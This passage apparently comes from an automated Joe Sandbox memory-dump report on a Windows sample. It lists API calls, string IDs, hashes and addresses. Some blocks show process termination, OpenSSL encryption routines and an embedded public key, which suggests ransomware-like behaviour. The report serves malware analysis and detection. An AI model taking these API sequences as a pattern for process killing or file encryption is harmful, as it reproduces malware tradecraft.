                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                • String ID: bad function call
                                                                                                • API String ID: 2464034642-3612616537
                                                                                                • Opcode ID: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
                                                                                                • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                • Opcode Fuzzy Hash: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
                                                                                                • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                • API String ID: 1717984340-2085858615
                                                                                                • Opcode ID: 73675a20a9300cbfb3356ca09084d0b3dfcbde4a4269266388fce0caa3adac80
                                                                                                • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                                • Opcode Fuzzy Hash: 73675a20a9300cbfb3356ca09084d0b3dfcbde4a4269266388fce0caa3adac80
                                                                                                • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                • String ID: cmd.exe
                                                                                                • API String ID: 2696918072-723907552
                                                                                                • Opcode ID: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                                                                                                • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                • Opcode Fuzzy Hash: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                                                                                                • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 0040F338
                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                • API String ID: 2574300362-2555811374
                                                                                                • Opcode ID: 794de65d126af65ce722b4b6d82f990fd5aed4b0eec27fc4de4360034f884efb
                                                                                                • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                • Opcode Fuzzy Hash: 794de65d126af65ce722b4b6d82f990fd5aed4b0eec27fc4de4360034f884efb
                                                                                                • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _malloc$__except_handler4_fprintf
                                                                                                • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                • API String ID: 1783060780-3771355929
                                                                                                • Opcode ID: 128416f102af0a080c1f2d632d4bd0007c2a6401087c60a73ae34128535de065
                                                                                                • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                                • Opcode Fuzzy Hash: 128416f102af0a080c1f2d632d4bd0007c2a6401087c60a73ae34128535de065
                                                                                                • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strncmp
                                                                                                • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                • API String ID: 909875538-2908105608
                                                                                                • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                APIs
                                                                                                • __getptd_noexit.LIBCMT ref: 004C5D3D
                                                                                                  • Part of subcall function 0042501F: GetLastError.KERNEL32(00000001,00000000,0042520D,00420CE9,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00425021
                                                                                                  • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                                                                                  • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                                                                                  • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                                                                                  • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00425083
                                                                                                • __calloc_crt.LIBCMT ref: 004C5D60
                                                                                                • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                                                                                • __invoke_watson.LIBCMT ref: 004C5D9B
                                                                                                • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                                                                                • __invoke_watson.LIBCMT ref: 004C5DEB
                                                                                                Strings
                                                                                                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
                                                                                                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                • API String ID: 2139067377-798102604
                                                                                                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                                                                                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                • API String ID: 1302938615-3129329331
                                                                                                • Opcode ID: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
                                                                                                • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                • Opcode Fuzzy Hash: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
                                                                                                • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                APIs
                                                                                                • timeGetTime.WINMM(?,?,?,?,0041EE2F), ref: 00411B1E
                                                                                                • timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B29
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                                                                                • DispatchMessageW.USER32(?), ref: 00411B5C
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                                                                                • Sleep.KERNEL32(00000064,?,?,0041EE2F), ref: 00411B72
                                                                                                • timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B78
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                • String ID:
                                                                                                • API String ID: 3697694649-0
                                                                                                • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                • String ID:
                                                                                                • API String ID: 3534693527-0
                                                                                                • Opcode ID: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
                                                                                                • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                • Opcode Fuzzy Hash: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
                                                                                                • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                APIs
                                                                                                • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ___from_strstr_to_strchr
                                                                                                • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                • API String ID: 601868998-2416195885
                                                                                                • Opcode ID: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
                                                                                                • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                                • Opcode Fuzzy Hash: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
                                                                                                • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                                • API String ID: 2102423945-3653307630
                                                                                                • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                                • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                                • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _fprintf_memset
                                                                                                • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                • API String ID: 3021507156-3399676524
                                                                                                • Opcode ID: 37c0a0619d1de68f8926526a4348b91c256fa9f986865ef3ae2ab210aec5a9ed
                                                                                                • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                                • Opcode Fuzzy Hash: 37c0a0619d1de68f8926526a4348b91c256fa9f986865ef3ae2ab210aec5a9ed
                                                                                                • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                                APIs
                                                                                                Strings
                                                                                                • -----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24, xrefs: 00419EC4
                                                                                                • p2Q, xrefs: 00419EE2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: -----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24$p2Q
                                                                                                • API String ID: 2102423945-1170899715
                                                                                                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                                                                                                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 0043B70B
                                                                                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                • _free.LIBCMT ref: 0043B71E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 1020059152-0
                                                                                                • Opcode ID: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
                                                                                                • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                • Opcode Fuzzy Hash: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
                                                                                                • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                                                                                • DispatchMessageW.USER32(?), ref: 0041F0B6
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                                                                                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 1380987712-0
                                                                                                • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                                                                                • DispatchMessageW.USER32(?), ref: 0041E546
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                                                                                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 1380987712-0
                                                                                                • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                                                                                • DispatchMessageW.USER32(?), ref: 0041FA7B
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                                                                                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 1380987712-0
                                                                                                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
